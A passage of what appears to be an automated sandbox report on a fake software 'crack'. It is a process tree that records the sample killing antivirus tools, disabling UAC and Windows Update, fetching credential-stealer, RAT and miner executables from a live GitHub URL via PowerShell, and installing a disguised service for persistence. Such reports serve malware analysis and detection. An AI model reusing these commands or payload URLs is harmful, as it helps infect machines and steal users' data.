                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5768
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM mbamtray.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4764
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop MBAMService
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:4908
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config MBAMService start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:4948
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM cis.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4812
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM cfp.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1500
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM cmdagent.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3920
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop CmdAgent
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:1472
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config CmdAgent start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:4896
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM sophosav.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5720
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM savservice.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5664
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM sophoshealth.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5876
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop "Sophos AV"
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:1756
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config "Sophos AV" start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:1992
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM psanhost.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4552
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM pavsrv.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3300
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM psimsvc.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2052
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop PandaSecurity
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:1816
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config PandaSecurity start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:1780
                                                                                                  • C:\Windows\system32\fltMC.exe
                                                                                                    fltmc unload kl1
                                                                                                    3⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5128
                                                                                                  • C:\Windows\system32\fltMC.exe
                                                                                                    fltmc unload bdsvm
                                                                                                    3⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5196
                                                                                                  • C:\Windows\system32\fltMC.exe
                                                                                                    fltmc unload aswSP
                                                                                                    3⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:320
                                                                                                  • C:\Windows\system32\fltMC.exe
                                                                                                    fltmc unload avgmfx86
                                                                                                    3⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2872
                                                                                                  • C:\Windows\system32\fltMC.exe
                                                                                                    fltmc unload tmcomm
                                                                                                    3⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2324
                                                                                                  • C:\Windows\system32\fltMC.exe
                                                                                                    fltmc unload mbamswissarmy
                                                                                                    3⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4500
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\SYSTEM\CurrentControlSet\Services\kl1" /v Start /t REG_DWORD /d 4 /f
                                                                                                    3⤵
                                                                                                      PID:2804
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\SYSTEM\CurrentControlSet\Services\bdsvm" /v Start /t REG_DWORD /d 4 /f
                                                                                                      3⤵
                                                                                                        PID:4164
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKLM\SYSTEM\CurrentControlSet\Services\aswSP" /v Start /t REG_DWORD /d 4 /f
                                                                                                        3⤵
                                                                                                          PID:1432
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\SYSTEM\CurrentControlSet\Services\avgmfx86" /v Start /t REG_DWORD /d 4 /f
                                                                                                          3⤵
                                                                                                            PID:3672
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKLM\SYSTEM\CurrentControlSet\Services\tmcomm" /v Start /t REG_DWORD /d 4 /f
                                                                                                            3⤵
                                                                                                              PID:2728
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add "HKLM\SYSTEM\CurrentControlSet\Services\mbamswissarmy" /v Start /t REG_DWORD /d 4 /f
                                                                                                              3⤵
                                                                                                                PID:3748
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks /create /tn "CrackTask" /tr "C:\ProgramData\Crack\Launcher.exe" /sc once /st 00:00 /ru SYSTEM /f
                                                                                                                3⤵
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:4276
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks /run /tn "CrackTask"
                                                                                                                3⤵
                                                                                                                  PID:2940
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  schtasks /delete /tn "CrackTask" /f
                                                                                                                  3⤵
                                                                                                                    PID:3796
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command "$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'https://github.com/seven7174o/ABUZA-GAY/raw/refs/heads/main/GRABBER.exe' -OutFile 'Launcher.exe'"
                                                                                                                    3⤵
                                                                                                                    • Blocklisted process makes network request
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Downloads MZ/PE file
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5508
                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                    attrib +h "C:\ProgramData\Crack\Launcher.exe" /s /d
                                                                                                                    3⤵
                                                                                                                    • Views/modifies file attributes
                                                                                                                    PID:2920
                                                                                                                  • C:\ProgramData\Crack\Launcher.exe
                                                                                                                    Launcher.exe
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5176
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command "$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'https://github.com/seven7174o/ABUZA-GAY/raw/refs/heads/main/STEALER.exe' -OutFile 'start.exe'"
                                                                                                                    3⤵
                                                                                                                    • Blocklisted process makes network request
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Downloads MZ/PE file
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5816
                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                    attrib +h "C:\ProgramData\Crack\start.exe" /s /d
                                                                                                                    3⤵
                                                                                                                    • Views/modifies file attributes
                                                                                                                    PID:4320
                                                                                                                  • C:\ProgramData\Crack\start.exe
                                                                                                                    start.exe
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                                                                    PID:2648
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command "$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'https://github.com/seven7174o/ABUZA-GAY/raw/refs/heads/main/RAT.exe' -OutFile 'explorer.exe'"
                                                                                                                    3⤵
                                                                                                                    • Blocklisted process makes network request
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Downloads MZ/PE file
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5388
                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                    attrib +h "C:\ProgramData\Crack\explorer.exe" /s /d
                                                                                                                    3⤵
                                                                                                                    • Views/modifies file attributes
                                                                                                                    PID:5796
                                                                                                                  • C:\ProgramData\Crack\explorer.exe
                                                                                                                    explorer.exe
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3528
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command "$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'https://github.com/seven7174o/ABUZA-GAY/raw/refs/heads/main/MINER.exe' -OutFile 'explorerS.exe'"
                                                                                                                    3⤵
                                                                                                                    • Blocklisted process makes network request
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Downloads MZ/PE file
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3488
                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                    attrib +h "C:\ProgramData\Crack\explorerS.exe" /s /d
                                                                                                                    3⤵
                                                                                                                    • Views/modifies file attributes
                                                                                                                    PID:5476
                                                                                                                  • C:\ProgramData\Crack\explorerS.exe
                                                                                                                    explorerS.exe
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4464
                                                                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                      4⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4660
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                      4⤵
                                                                                                                        PID:2800
                                                                                                                        • C:\Windows\system32\wusa.exe
                                                                                                                          wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                          5⤵
                                                                                                                            PID:748
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                          4⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:4284
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                          4⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:1596
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                          4⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:1908
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe stop bits
                                                                                                                          4⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:2604
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe stop dosvc
                                                                                                                          4⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:5684
                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                          4⤵
                                                                                                                          • Power Settings
                                                                                                                          PID:5236
                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                          4⤵
                                                                                                                          • Power Settings
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2072
                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                          4⤵
                                                                                                                          • Power Settings
                                                                                                                          PID:4652
                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                          4⤵
                                                                                                                          • Power Settings
                                                                                                                          PID:1816
                                                                                                                        • C:\Windows\system32\dialer.exe
                                                                                                                          C:\Windows\system32\dialer.exe
                                                                                                                          4⤵
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3712
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe delete "explorer"
                                                                                                                          4⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:5196
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe create "explorer" binpath= "C:\ProgramData\Windows\explorer.exe" start= "auto"
                                                                                                                          4⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:5788
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe stop eventlog
                                                                                                                          4⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:888
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          C:\Windows\system32\sc.exe start "explorer"
                                                                                                                          4⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:3044
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            5⤵
                                                                                                                              PID:2748
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                          3⤵
                                                                                                                          • UAC bypass
                                                                                                                          • Modifies registry key
                                                                                                                          PID:6016
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping -n 2 127.0.0.1
                                                                                                                          3⤵
                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:6056
                                                                                                                        • C:\Windows\system32\cscript.exe
                                                                                                                          cscript //nologo temp.vbs
                                                                                                                          3⤵
                                                                                                                            PID:400
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              4⤵
                                                                                                                                PID:4912
                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                              ping -n 4 127.0.0.1
                                                                                                                              3⤵
                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                              • Runs ping.exe
                                                                                                                              PID:4864
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://t.me/StopCrashingsBot?start=CHEATCRACK"
                                                                                                                              3⤵
                                                                                                                                PID:4900
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch https://t.me/StopCrashingsBot?start=CHEATCRACK
                                                                                                                                  4⤵
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  • Enumerates system info in registry
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  • Modifies registry class
                                                                                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  PID:4164
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x258,0x25c,0x260,0x254,0x2f4,0x7ffc460ef208,0x7ffc460ef214,0x7ffc460ef220
                                                                                                                                    5⤵
                                                                                                                                      PID:4572
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1924,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=308 /prefetch:3
                                                                                                                                      5⤵
                                                                                                                                        PID:5880
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2296,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=2288 /prefetch:2
                                                                                                                                        5⤵
                                                                                                                                          PID:3892
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2512,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=3148 /prefetch:8
                                                                                                                                          5⤵
                                                                                                                                            PID:4568
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3408,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=3416 /prefetch:1
                                                                                                                                            5⤵
                                                                                                                                              PID:3516
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3420,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=3448 /prefetch:1
                                                                                                                                              5⤵
                                                                                                                                                PID:5816
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4884,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=4896 /prefetch:1
                                                                                                                                                5⤵
                                                                                                                                                  PID:4896
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5156,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5192 /prefetch:8
                                                                                                                                                  5⤵
                                                                                                                                                    PID:3580
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5180,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5212 /prefetch:8
                                                                                                                                                    5⤵
                                                                                                                                                      PID:2372
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5528,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5372 /prefetch:8
                                                                                                                                                      5⤵
                                                                                                                                                        PID:5484
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5736,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:8
                                                                                                                                                        5⤵
                                                                                                                                                          PID:3908
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5736,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:8
                                                                                                                                                          5⤵
                                                                                                                                                            PID:2212
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3436,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5616 /prefetch:8
                                                                                                                                                            5⤵
                                                                                                                                                              PID:724
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5872,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=3464 /prefetch:8
                                                                                                                                                              5⤵
                                                                                                                                                                PID:920
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5832,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6336 /prefetch:8
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:1744
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5888,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6384 /prefetch:8
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:3372
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5860,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6388 /prefetch:8
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:3420
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5220,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5308 /prefetch:8
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:3400
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:8
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:5884
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5160,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=2688 /prefetch:8
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:728
                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6536,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=2692 /prefetch:8
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:4840
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
